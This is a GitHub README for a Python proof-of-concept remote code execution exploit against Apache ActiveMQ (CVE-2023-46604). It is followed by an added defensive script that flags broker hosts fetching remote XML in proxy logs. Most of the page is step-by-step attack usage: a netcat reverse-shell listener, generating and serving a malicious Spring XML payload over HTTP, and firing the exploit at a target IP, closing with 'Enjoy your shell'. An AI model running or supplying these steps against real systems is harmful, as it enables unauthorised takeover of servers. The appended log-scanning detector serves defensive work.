
STK-Security/CVE-2023-46604-ActiveMQ-RCE-Python

 
 

CVE-2023-46604 ActiveMQ RCE PoC (Python) - tested on 5.15.15

Python proof-of-concept exploit for Apache ActiveMQ CVE-2023-46604 (Remote Code Execution).
This implementation generates the malicious Spring XML payload and sends the exploit packet to the broker.

Demo Video (YouTube Shorts): CVE-2023-46604 Demo

Usage

# 1. Clone this repository
git clone https://github.com/strikoder/CVE-2023-46604-ActiveMQ-RCE-Python.git
cd CVE-2023-46604-ActiveMQ-RCE-Python

# 2. Start a listener on your machine
# let's say 1001 for example lool
nc -nvlp 1001

# 3. Generate the malicious XML file
# Replace $YOUR_IP with your IP, and 1001 with your listener port
python3 generate_poc.py -i $YOUR_IP -p 1001

# 4. Start a simple HTTP server in the same folder (to serve the XML payload)
# choose whatever port you want B00B
python3 -m http.server 2002

# 5. Run the exploit
python3 main.py -i $TARGET_IP -u http://$YOUR_IP:2002/poc-linux.xml

Enjoy your shell :)
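
A defender-side check for the callback in steps 4 and 5, where the broker retrieves the XML over HTTP: this added example (not part of the repository) scans egress proxy logs for a broker host fetching an .xml resource from a non-allowlisted destination. The broker addresses, the allowlist, and the log layout are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumptions (not from the original page): the broker addresses, the allowlist,
# and the proxy log layout: <time> <src> <method> <url> <status> "<user-agent>"
BROKER_HOSTS = {"10.0.5.20"}
ALLOWED_DESTS = {"repo.internal.example"}
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')

def suspicious_fetches(lines):
    """Return (time, src, url, reasons) for broker-originated remote XML fetches."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        ts, src, method, url, _status, agent = m.groups()
        parts = urlsplit(url)
        host = parts.hostname or ""
        if src not in BROKER_HOSTS or method != "GET":
            continue
        if not parts.path.lower().endswith(".xml") or host in ALLOWED_DESTS:
            continue
        reasons = ["broker fetched remote XML from non-allowlisted host"]
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            reasons.append("destination is a bare IP address")
        if parts.port not in (None, 80, 443):
            reasons.append(f"non-standard port {parts.port}")
        if agent.startswith("Java/"):
            reasons.append("default JVM user agent")
        hits.append((ts, src, url, reasons))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
2024-01-10T09:14:02Z 10.0.5.20 GET http://repo.internal.example/config/beans.xml 200 "Java/11.0.20"
2024-01-10T09:15:40Z 10.0.5.20 GET http://203.0.113.7:2002/poc-linux.xml 200 "Java/11.0.20"
2024-01-10T09:16:11Z 10.0.7.31 GET http://198.51.100.9/feed.xml 200 "Mozilla/5.0"
this line is malformed
2024-01-10T09:17:55Z 10.0.5.20 GET http://updates.example.net/index.html 200 "Java/11.0.20"
"""

if __name__ == "__main__":
    for ts, src, url, reasons in suspicious_fetches(SAMPLE_LOG.splitlines()):
        print(f"{ts} {src} -> {url}: " + "; ".join(reasons))
```

A message broker rarely has a legitimate reason to pull XML from arbitrary hosts, so a hit here is worth correlating with broker process activity around the same timestamp.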
